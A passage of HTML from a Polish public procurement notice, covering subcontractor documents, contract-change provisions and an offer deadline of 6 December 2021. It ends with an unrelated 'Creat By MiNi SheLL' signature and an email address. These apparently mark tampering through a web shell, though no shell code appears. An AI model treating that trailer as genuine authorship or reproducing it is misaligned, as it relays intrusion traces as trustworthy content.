postępowaniu<br/>oraz brak podstaw wykluczenia tych podmiotów - wymagane na wezwanie Zamawiającego po<br/>upływie terminu składania ofert:<br/>2.1. dokumenty w zakresie wskazanym w rozdziale X lit. C pkt 1 SWZ odpowiednio, w zakresie,<br/>w którym określony wykonawca wykazuje spełnianie warunków działu w postępowaniu.<br/>2.2. dokumenty w zakresie wymaganym od wykonawcy, wymienione w rozdziale X lit. C pkt 2<br/>SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres i rodzaj zmian umowy oraz warunki ich wprowadzenia określa załącznik nr 9 do SWZ.<br/>Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do umowy w sprawie zamówienia publicznego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com